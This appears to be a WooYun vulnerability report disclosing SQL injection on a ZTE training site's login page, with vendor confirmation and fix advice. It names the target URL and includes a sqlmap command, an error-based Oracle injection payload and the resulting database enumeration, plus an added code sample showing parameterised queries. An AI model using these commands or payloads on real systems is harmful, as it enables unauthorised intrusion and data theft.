
Vulnerability summary

Defect ID: wooyun-2013-042708

Title: SQL injection vulnerability in a ZTE knowledge sub-site

Vendor: ZTE Corporation

Author: Mutoubug

Submitted: 2013-11-12 18:48

Fixed: 2013-12-27 18:48

Published: 2013-12-27 18:48

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2013-11-12: Details sent to the vendor, awaiting vendor response
2013-11-13: Vendor confirmed; details disclosed to the vendor only
2013-11-23: Details disclosed to core white hats and domain experts
2013-12-03: Details disclosed to regular white hats
2013-12-13: Details disclosed to intern white hats
2013-12-27: Details disclosed to the public

Brief description:

ZTE phones are pretty good..

Detailed description:

Affected page: http://univ.zte.com.cn:80/ztetrain/login.aspx
Submitting the username admin' with any password is enough to trigger a database error.

[screenshot: zte1.jpg]


Then capture the request and run it through sqlmap; the vulnerable parameter is TextID. The --ignore-proxy option has to be added, otherwise sqlmap doesn't retrieve any data.
sqlmap command: sqlmap.py -r ztepost.txt -p TextID --dbs --dbms "Oracle" --ignore-proxy
Below is what it turned up:
sqlmap identified the following injection points with a total of 61 HTTP(s) requests:
---
Place: POST
Parameter: TextID
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJOTY4NzU3MjQ5D2QWAmYPZBYCAgEPD2QWAh4HT25DbGljawUOc3VibWl0Rm9ybSgpOyBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQZJbWFnZTFRH0RDXoSQjdJbKgeO6B2jmWCSjQ==&__EVENTVALIDATION=/wEWBAK47NXJCwL7k7GyCgLf2eqGAwKOrcejAxeZaRn9jJujrH6YeC8apWdp5DBm&TextID=admin' AND 6453=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(121)||CHR(113)||CHR(108)||CHR(113)||(SELECT (CASE WHEN (6453=6453) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(99)||CHR(109)||CHR(119)||CHR(113)||CHR(62))) FROM DUAL) AND 'bjlR'='bjlR&Image1.x=23&Image1.y=29&TextPwd=admin
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
available databases [12]:
[*] CTXSYS
[*] ELEARNING
[*] EMPTRAIN
[*] EUNIV
[*] EVALCENTER
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] XSEXAM
[*] ZTETRAIN
Then I counted the rows in one database (ZTETRAIN) to see how much data it holds:
That's no small amount either.. I didn't enumerate the other databases..

Proof of vulnerability:


[screenshot: zte2.jpg]

Fix recommendation:

1. Filter the TextID parameter.
2. If the page is no longer needed, just remove it..
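As an added illustration of the fix (not code from the report or from ZTE's application), the following shows the concatenation pattern that makes a lone quote in TextID surface a database error, next to the bind-parameter form that treats the same input as plain data and returns only a generic message. It assumes sqlite3 as an offline stand-in for Oracle, and the table and column names are invented.

```python
import sqlite3

# Constructed stand-in for the login lookup: sqlite3 replaces Oracle so the
# example runs offline; table and column names are assumptions, not from the page.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE USERS (USERID TEXT, PASSWD TEXT)")
    conn.execute("INSERT INTO USERS VALUES ('alice', 'correct-horse')")
    return conn

def vulnerable_login(conn, text_id, text_pwd):
    # The defect behind the report: user input pasted into the SQL text.
    # A single quote breaks the statement; when the resulting database error
    # reaches the HTTP response, it becomes the channel that error-based
    # injection tools rely on.
    sql = ("SELECT USERID FROM USERS WHERE USERID='" + text_id +
           "' AND PASSWD='" + text_pwd + "'")
    return conn.execute(sql).fetchone()

def db_error_leaks(conn, text_id, text_pwd):
    # Returns the database error text the vulnerable handler would expose,
    # or None when the statement parses cleanly.
    try:
        vulnerable_login(conn, text_id, text_pwd)
    except sqlite3.Error as exc:
        return str(exc)
    return None

def safe_login(conn, text_id, text_pwd):
    # Hardened form: bind parameters, so the quote is data, not SQL syntax.
    # In the ASP.NET/Oracle stack of the report, OracleCommand with
    # OracleParameter objects plays the same role.
    sql = "SELECT USERID FROM USERS WHERE USERID=? AND PASSWD=?"
    return conn.execute(sql, (text_id, text_pwd)).fetchone()

def login_response(conn, text_id, text_pwd):
    # Never echo the database's own message to the client; a generic reply
    # closes the error channel even if a bug slips through elsewhere.
    try:
        row = safe_login(conn, text_id, text_pwd)
    except sqlite3.Error:
        return "login failed"
    return "welcome " + row[0] if row else "login failed"
```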

Copyright notice: when reposting, please credit the source Mutoubug@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 5

Confirmed: 2013-11-13 08:52

Vendor reply:

Thanks to Mutoubug for your attention to our company's website security. The issue has been forwarded to the relevant department for handling. We will notify you of the latest progress on this issue as soon as possible. Thank you!

Latest status:

None yet

